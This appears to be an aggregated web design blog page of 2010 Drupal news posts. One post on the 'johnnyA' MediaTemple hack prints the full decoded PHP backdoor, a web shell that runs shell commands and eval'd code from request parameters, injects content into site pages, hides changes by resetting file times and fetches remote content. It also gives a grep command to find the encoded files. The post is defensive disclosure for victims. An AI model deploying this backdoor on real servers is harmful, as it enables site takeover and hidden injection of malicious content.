Web Design and Development
Drupalcon SF 2010: DrupalCon Mobile Site is Live
Hello everyone, if your wireless drops or if you do not have a laptop just use your smart phone. The mobile site has a useful interface to view the schedule by day and by track.
I am hosting a BOF in room 206 at 4:15pm today, Monday to present how we created the mobile version of the DrupalCon website. The mobile version will automatically load for all webkit based smart phones.
Pronovix: RDF Semantic Web is working and it could be running on Drupal - or also: we need more researchers!
Tonight a tweet from Laura Scott lead me to a blogpost by Zack Rosen at Semantic Focus. From the first sentence it seemed a bit odd, it's been more than 12 years since Tim Berners-Lee started working on the Semantic Web and most if not all of the points that followed seemed outdated. Only at the end of the article in the comments it then turned out that this was actually an article from 2006 (later a notice was added).
Anyway, the article made me think about all the ways that Drupal is making the Semantic Web so much more attainable today.
Boris Mann: Being involved in the issue queue as a normal part of development
Patches that we write for drupal.org modules are submitted to the issue queue, and we refer to the patch’s location on drupal.org in the make file. This has made us much better contributors to other people projects as it makes being involved in the issue queue a normal part of development, and it encourages us to only patch contrib modules where it’s likely that the patch will be accepted. When a patch gets a review, we make changes, upload a newer version of the patch to drupal.org, and update our make file.
This is actually a quote from Jeff in the comments on the article Drush Make Files for Production Drupal sites, but I thought it was definitely worth highlighting on its own.
Pronovix: Drupal the card game, 3rd edition
We really liked the concept of the Drupal card game pioneered by NodeOne. It is a great starting point for coaches to teach teams the value of collaboration. If you make an external reward system (e.g. winning team gets a bag of sweets) and you let teams play a couple of games, you can make a meta-game in which teams can experience the difference between different playing styles (and therefore the value of collaboration).
For the Donation+ fundraising we wanted to give something back to our donors that would speak to their Drupal geekpride and that would be fun. We talked with Rustan Håkansson, the developer of the Drupal card game, who warned us that it is difficult to fine tune the rules of a game and that it is especially hard to come up with a game that will actually be enjoyable. Since the Drupal card game is licensed under a Creative Commons Attribution Share Alike license, we decided to make a reprint of the NodeOne card game.
Details of the johnnyA MediaTemple Hack
Update: MediaTemple directed me to another blog post with additional details. This highlights another problem with this incident. The information has been spread all over the place. While this blog post does give some good details, it still does not provide cleanup instructions. It simply says that all malicious files have been removed. I’m sorry to say that they have not.
If you have websites hosted on a MediaTemple (gs) then you may have been a victim of this annoying redirect hack, unofficially known as the johnnyA hack. It was once thought to be an issue with WordPress, but in reality static sites are also affected by this. Essentially the attack works by including some encoded JavaScript onto your pages that tries to redirect you to a malicious website or file.
After much searching and with the help of this blog post, I have found the rootkit that is used to do the damage. If you have been hacked you will find some PHP files that were created by the attackers with a bunch of gzipped, base64-encoded source code. I converted that into the actual attack code which is listed below:
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
<?PHP
@ignore_user_abort(1);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@error_reporting(0);
@ini_set("memory_limit","16M");
if (!function_exists('rand_checkstr'))
{
function rand_checkstr()
{
$c5 = 1;
$c3 = 8;
$e7 ="";
for ($f3=0;$f3<$c3;$f3++) {
$c4 = mt_rand(1,7);
switch ($c4) {
case ($c4<=2):
$e7 .= mt_rand(0,9);
break;
case ($c4<=4):
$e7 .= chr(mt_rand(65,90));
break;
case ($c4<=6):
$e7 .= chr(mt_rand(97,122));
break;
case 7:
$e6 = strlen($e7);
if ($c5>0&&$e6>0&&$e6<($c3-1)&&$e7[$e6-1]!="_")
{
$e7 .= "_";
$c5--;
}
else
{
$f3--;
continue;
}
break;
}
}
return $e7;
}
}
if (!function_exists('strrevpos'))
{
function strrevpos($f4, $f6)
{
$f5 = strpos (strrev($f4), strrev($f6));
if ($f5===false)
return false;
else
return strlen($f4) - $f5 - strlen($f6);
}
}
if (!function_exists('after'))
{
function after ($this, $d8)
{
if (!is_bool(strpos($d8, $this)))
return substr($d8, strpos($d8,$this)+strlen($this));
}
}
if (!function_exists('after_last'))
{
function after_last ($this, $d8)
{
if (!is_bool(strrevpos($d8, $this)))
return substr($d8, strrevpos($d8, $this)+strlen($this));
}
}
if (!function_exists('before'))
{
function before ($this, $d8)
{
return substr($d8, 0, strpos($d8, $this));
}
}
if (!function_exists('before_last'))
{
function before_last ($this, $d8)
{
return substr($d8, 0, strrevpos($d8, $this));
}
}
if (!function_exists('between'))
{
function between ($this, $f7, $d8)
{
return before($f7, after($this, $d8));
}
}
if (!function_exists('between_last'))
{
function between_last ($this, $f7, $d8)
{
return after_last($this, before_last($f7, $d8));
}
}
if (!function_exists('stripslashes2'))
{
function stripslashes2($d3)
{
$d3 = str_replace('\\\\\\"', '\\"', $d3);
$d3 = str_replace("\\\'", "'", $d3);
$d3 = str_replace("\\\\\\\\", "\\\\", $d3);
return $d3;
}
}
if (!function_exists('getfiles'))
{
function getfiles($d4, $f1, $d5=0, $f8="\\")
{
if(!is_dir($d4))
{
return null;
}
$d9=($f8=="\\")?"/":$f8;
$d4=str_replace($f8,$d9,$d4);
$d4=str_replace("//",$d9,$d4);
$d4=(strrpos($d4, $d9)==strlen($d4)-1)? substr($d4, 0, strlen($d4)-1):$d4;
$e0=substr_count($d4, $d9);
$d5=(!$d5)?-1:$d5+$e0;
$e8=array();
$d7=array( array($d4, $e0) );
while(sizeof($d7) && $d7[0][1]!=$d5)
{
$d6=array_shift($d7);
$f9=opendir($d6[0]);
while( ($f0=readdir($f9))!==false )
{
if( strrpos($f0,".") === (strlen($f0)-1))
{
continue;
};
$f2=$d6[0].$d9.$f0;
if(is_dir($f2))
{
$e9[]=$f2;
$d7[]=array( $f2, substr_count($f2, $d9) );
}
else
{
foreach($f1 as $f3)
{
if(preg_match($f3,$f2))
{
$e8[]=$f2;break;};
}
};
};
}
return $e8;
}
}
if (!function_exists('checkcontent2'))
{
function checkcontent2($g0)
{
$e5 = array("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
"Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.xx) Gecko/20030504 Mozilla Firebird/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5");
if (function_exists('curl_init'))
{
$g2 = $e5[rand(0,count($e5)-1)];
$g1 = curl_init();
curl_setopt($g1, CURLOPT_URL, $g0);
curl_setopt($g1, CURLOPT_HEADER, 0);
curl_setopt($g1, CURLOPT_TIMEOUT, 30);
curl_setopt($g1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($g1, CURLOPT_USERAGENT, $g2);
curl_setopt($g1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($g1, CURLOPT_MAXREDIRS, 2);
$g3 = curl_exec($g1);
curl_close($g1);
if ($g3 !== false)
{
return $g3;
}
}
else if (ini_get('allow_url_fopen') == '1')
{
$g3 = file_get_contents($g0);
if ($g3 !== false)
{
return $g3;
}
}
else
{
echo "<h5 style='color:maroon'>Can't download ".$g0." - EXIT;</h5>";
exit;
}
}
}
if (!function_exists('getcode'))
{
function getcode($g4,$d0)
{
$c8 = '';
if(preg_match("/$d0/",$g4))
{
$c8 = preg_replace("/.*<b1><!--|$d0|--><\/b1>.*/msi","",$g4);
}
return $c8;
}
}
$d1 = array("(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)");
$a7 = array("/<ad>.*<\/ad>/si",
"/<ads>.*<\/ads>/si",
"/<bb1>.*<bb2>/si",
"/<b1>.*<\/b1>/si",
"/<bb1><bb1>/si",
"/<bb2><bb2>/si",
"/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui",
"/<a.*(viagra|cialis|phentermine|vioxx|hydrocodon|oxycontin|levitra|ambien|xanax|adipex|cheap pills|paxil|Codeine|vicodin|tramadol|tadalafil|carisoprodol|mesothelioma|lorazepam|propecia|protonix|prozac|prescription|buy cheap|zithromax)+.*><\/a>/i");
if (isset($_REQUEST['update1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['update1'])));
$b0 = $b4[0];
$b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
if (strlen($b0) > 1)
$b0 = "<ads>".$b0."</ads>";
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$b7 = false;
if (eregi(".htm",$a3) !== false || eregi(".shtm",$a3) !== false)
$b7 = true;
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
else if ($b7 == true)
{
$a0=$b0."</body></html>";
$a1.=$a0;
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w+");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
if ($a2 == true)
echo "<pre>update $a3</pre>";
if ($a5 == true)
echo "<pre>spam removed $a3</pre>";
}
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no rw file $a3</pre>";
}
}
}
if (isset($_REQUEST['update2']))
{
$b0 = gzinflate(base64_decode($_REQUEST['update2']));
$a6 = $_SERVER['SCRIPT_FILENAME'];
$b6 = before_last('/',$a6);
if (!is_writable($b6))
@chmod($b6, 0644);
$b8 = @filemtime($b6);
@copy($a6,$a6.'1.php');
@touch($b6,$b8,$b8);
@touch($a6.'1.php',$b8,$b8);
if (!is_writable($a6))
@chmod($a6, 0644);
if (is_writable($a6))
{
$a1 = trim(file_get_contents($a6));
$b3 = preg_replace('/^\<\?php.*\?\>/Usi','',$a1);
$a4 = @filemtime($a6);
$b1 = fopen($a6, "w");
fwrite($b1, $b0.$b3);
fclose($b1);
@touch($a6,$a4,$a4);
echo "<pre>update</pre>";
}
else
{
echo "<pre>no rw $a3</pre>";
}
}
if (isset($_REQUEST['update3']))
{
echo "<pre>";
$a8 = $_REQUEST['update3'];
$b4 = '';
if (!empty($a8))
{
if(function_exists('exec'))
{
@exec($a8,$b4);
$b4 = join("\n",$b4);
}
elseif(function_exists('shell_exec'))
{
$b4 = @shell_exec($a8);
}
elseif(function_exists('system'))
{
@ob_start();
@system($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($b2 = @popen($a8,"r")))
{
$b4 = "";
while(!@feof($b2))
{
$b4 .= @fread($b2,1024);
}
@pclose($b2);
}
}
echo $b4;
echo "</pre>";
}
if (isset($_REQUEST['add1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['add1'])));
$b0 = $b4[0]; $b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
$a1 = preg_replace("/var\sst1(.*)gr0\=0\;/i", "", $a1);
$a1=$b0.$a1;
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
echo "<pre>update $a3</pre>";
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no w file $a3</pre>";
}
}
}
if (isset($_REQUEST["ev1"]))
{
$b9=base64_decode($_REQUEST["ev1"]);
if (isset($_REQUEST["s"]))
{
$b9=stripslashes2($b9);
};
eval($b9);
exit();
}
if (isset($_REQUEST["info1"]))
{
$c0 = 'dGVzdDEyNw==';
$c1 = @get_current_user();
echo "<!--".base64_decode($c0)."(($c1))-->";
exit;
}
if (isset($_REQUEST["get1"]))
{
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get1']) : $c6 = $_REQUEST['get1'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$d0 = rand_checkstr();
$e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\.|^auth.*\.|^.*footer.*\.|^home.*\.|^.*templ.*\.|^inc.*\.|^page.*\.|^hyperseek.*\.|^Output.*\.|^comment.*\.|^uifunctions.*\.|^bottom.*\.|^infocus.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|templ.*$|xml$|sht$|ctp$))");
$b5 = getfiles($d2, $e1, 4);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$e2 = base64_encode(gzcompress($a3,9));
$b0 ="<b1><!--".$d0.$e2."--></b1>";
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
$c9 = checkcontent2($c6);
if (eregi($d0, $c9))
{
$c9 = gzuncompress(base64_decode(getcode($c9,$d0)));
echo $c9;
}
foreach($b5 as $a3)
{
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if ($a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
exit;
}
if (isset($_REQUEST["get2"]))
{
$e3 = array();
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get2']) : $c6 = $_REQUEST['get2'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$c7 = checkcontent2($c6);
$c6 = preg_replace("/^www\./i", "", $c6);
preg_match_all("/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", $c7,$c8);
foreach ($c8[2] as $e4)
{
if (preg_match('/^http/i',$e4))
{
if (preg_match("/$c6/i",$e4))
{
$b2 = $d2.after($c6,$e4);
if (file_exists($b2))
$e3[] = $b2;
}
}
else
{
$b2 = $d2.'/'.$e4;
if (file_exists($b2))
$e3[] = $b2;
}
}
echo ($e3[rand(0,count($e3)-1)]);
exit;
}
?>
It looks like the attackers simply visit this PHP page and pass in some request parameters to tailor the attack. It looks like there are a few different options such as generating files, executing shell code, etc. I’m no PHP wizard so let me know if you find something interesting.
So how do you find these PHP files? Just SSH into your root directory and run:
1grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
This will list all files that have a string that is longer than 255 characters. This should help you locate these files.
My big question is for MediaTemple. What the hell are you guys doing? Why are we having to dig around for this information? Surely you have determined the same things so why are you not telling people how to clean it up? This official blog post from MediaTemple is vague and tells us nothing about how to actually clean our servers up. Do your job!
BenBuckman.net: Customizing Drupal date field with hook_form_alter and #after_build
I spent a long time today trying to figure out how to customize a Date field in Drupal 6. The field is called field_recurring_dates and looked like this:
Dale McGladdery: The Examples for Developers Module
An example, like a picture, is worth 1000 words. Until recently Drupal programming examples existed but were spread among documentation pages, blog posts, and the Drupal CVS repository; some searching required. That changed in late 2009 with the introduction of the Examples for Developers module. Its purpose: "to provide high-quality, well-documented API examples for a broad range of Drupal core functionality". Now you can find high-quality, working Drupal 6 and 7 code examples in one place, many with SimpleTests.
The Examples for Developers Module, or simply Examples Module, is actually a collection of modules. Each sub-module contains a single, specific example of how to use an API or implement a feature. At the time of writing there are 17 examples:
New Tutorial on Flash to HTML5 Video Fallback
I just uploaded a new tutorial that shows you how to provide an HTML5 video fallback option for devices that do not support the Flash Player. The tutorial also shows you how to use the new Flash Media Playback component for quickly adding video to your websites. If getting your video out to the largest number of people is your goal, providing an HTML5 fallback is an absolute necessity.
Marek Sotak: Drupal theming nightmares part 2
Welcome to the second part of the Drupal theming nightmares series. Not really surprised by the feedback I've got in the previous post. Most of you were enough lucky to stumble on the same problems. While the post was focused on the theming mistakes, it raised a discussion about unfinished jobs too. So if you haven't read it, it is right here: Drupal theming nightmares part 1.
That day, when I found out what I will be working with, I wasn't able to fall asleep (and it wasn't because of the litres of green tea I had). I was thinking about the person/company that wrote it, whether they are haunted in theirs dreams, do they even care? They should, you should, we all should. Take some responsibility for what you are doing. Do it right. I tend to ask people: "Would architect build a house ignoring physics?" Of course not, if he did, people might die. In our binary world we say kittens might die. Familiar right? But this could be another blog post. Lets move on.
Karl Scheirer: using RewriteMap
This is an Apache Directive that I've never had to use before, but it came in very handy for a very specific problem.
There was already an apache redirect (RewriteRule + RewriteCond) in place, but the destination URL was case sensitive! That's not normally a problem, but it was for an ad server, and the variables were coming in as uppercase, but needed to be lowercase after the redirect. Bad programming on the part of the ad server in my opinion, but we're not going to let that stop us! :)
RewriteMap to the rescue!
First off, the actual directive is a lot like a function definition, and it can only go in a config file or vhost, it's not allowed in a .htaccess file. Luckily the one we want to use is built in, so we just make it available with:
RewriteMap lc int:tolowerThis makes the "lc" function is available in our rewrite rules. We start off with the condition and basic rule ...
Acquia: Membase and Drupal
Barry and I just met with a team from Northscale -- the startup formed to support and extend Memcached, the popular key-value cache used by the largest web sites. We learned about their new database project, Membase, and talked about how it could help high-volume Drupal sites including our Acquia Hosting customers.
Membase is built on the core Memcached technology and supports the Memcached API. I'm excited about what they've done to extend Memcached: Read full article »
Lullabot: Podcast 87: Panels vs Context, The Cage Match!
Earl Miles and Young Hahn join Dave Burns, Jeff Eaton, and Jeff Robbins to discuss the similarities and differences between Drupal's Panels and Context modules. Earl is the creator of Panels. Young is the co-creator of Context as well as Features, Spaces, and several other great modules. We open up the cage, toss everyone in, and see what happens!
Also be sure to check out David Burns' article "Assembling Pages with Drupal," which also compares and contrasts Panels and Context.
Damien McKenna: Test upload
Testing out the Drag'n'Drop Uploads module to see how it works.
Randy Fay: What's wrong with Mollom?
So Mollom absolutely stinks, as far as I'm concerned.
I just posted this comment on a site that is not mine, but is a Drupal site running Mollom: http://www.istos.it/blog/drupal-training/open-sourcing-drupal-training:
The Examples for Developers project is an open-source training initiative. I'm trying to get it used for developer training and to have books on Drupal development use it for examples instead of rolling their own (which invariably get out-of-date and can't be maintained.)
I encourage you in this (vast) initiative.
And what did I get?
Your submission has triggered the spam filter and will not be accepted.
That's about the fourth time I've taken the time to write a comment on a Drupal Mollom-enabled site, and gotten that kind of a response. How many comments are being rejected inappropriately on sites that use Mollom? Who will ever know?
Store RSS Feed And Sitemap v.1.0.0.0 - Google Base Compatible
This module Creates A Store RSS Feed, Out Of The Box Ready For Use With Google Base, But The User Is Given The Flexibility To Include Or Exclude Elements To Suit Any Other Use, Flexibility And Ease Of Use Were Both Priorities In Creating This Module.
Additionally The Module Creates A Sitemap, Both Are Indespensable Tools For Any Website.
Localize.drupal.org: Drupalcon Copenhagen multilingual coverage, Jacob Redding talks Localization server
I just had the chance to listen to the latest DrupalEasy Podcast published earlier this week, where Ryan Price and Mike Anello interview Jacob Redding on his work, book, and Drupal's general greatness in many fields. Jacob was an early supporter of the Localization server idea that was built out to eventually power http://localize.drupal.org, so it was great to hear that he gives some exciting coverage of the topic (at about the middle of the podcast). He explains the Localization client and its connection to the server and how these two interact to get as many people submit translations as possible. If you are not using the Localization client yet, this might be a good time to look at it.
Ronald Ashri: Open Sourcing Drupal Training
As Drupal gains popularity, the need for developers is increasing and consequently so is the need for trainers. Let's make sure that the first point of contact for people to the community is a positive experience by open-sourcing our methods of teaching.
How do you explain Drupal to someone completely new to both Drupal and to content management systems? What are the metaphors that people have found work best?
How do you go about introducing hooks and the menu system to developers? Views, Panels, CCK, Context?
Wim Mostrey: The Wysiwyg and CCK multiple value fields
Setting up a Wysiwyg or rich text editor in Drupal is a straightforward task: you download the Wysiwyg module along with the library of your favorite editor and you're good to go. You will run into issues when you're using CCK multiple value fields though:
Pronovix: Modulecraft: fundraising to make a Drupal DITA documentation distribution
This week we launched modulecraft.com a fundraising tool that we want to use to raise interest, involvement and money for the development of a series of tools for Drupal professionals. Pure donation systems like chip-in have a pretty bad track record, but a donation/reward system has to our knowledge not yet been tried in the Drupal community. When you donate you will be contributing to the community AND getting something valuable in return.
We launched the platform with Documentation+, our first fundraising effort which primary aim is the development of a Documentation distro for Drupal.
For a couple of years now, people in the documentation team have been wanting to implement a DITA architecture for the documentation. DITA is an open standard managed that was initially developed by IBM that is now managed by Oasis. It is fairly young, but has gained a lot of momentum in the documentation industry.
Chris Shattuck: Using the Evernote module to manage an entire Drupal website with a desktop application
This tutorial is sponsored by the Save Joseph campaign. Only 6 more days to save one man from a roomful of teeth. http://savejoseph.org.
I've recently been using the Evernote module to blog, which has made my life surprisingly more rich. After building the module, I started using it right away and found it was the missing piece in creating a workflow that would encourage quality, rapid posting - something I've always wanted to be able to do. Now that its set up, I feel like I can write with virtually no overhead, and using images - kind of tricky when using webforms and wysiwyg - is about as easy as it can get. Even adding annotations is super simple with Skitch (writeup for a workflow with Skitch is imminent).
The ease with which I can create content made me wonder if maybe I could run an entire Drupal site's content off of Evernote. So I gave it a shot when setting up http://josephcowman.com, and it worked like a charm!
Recent blog posts
- Free File Synchronization Utilities
- ActionScript 3 speed optimization
- Adobe CS5 New Features
- How to create a web site icon
- New Reason Refill Released - Auditory Vortex - Thor Vol. 1
- Flash and AIR Debugger, Open Source
- Hard Drive Visualizer
- Free Media Player Released - Open Source VLC
- Flash Actionscript Editor: Flex Builder vs. FlashDevelop
- Free Font Viewer
Syndicate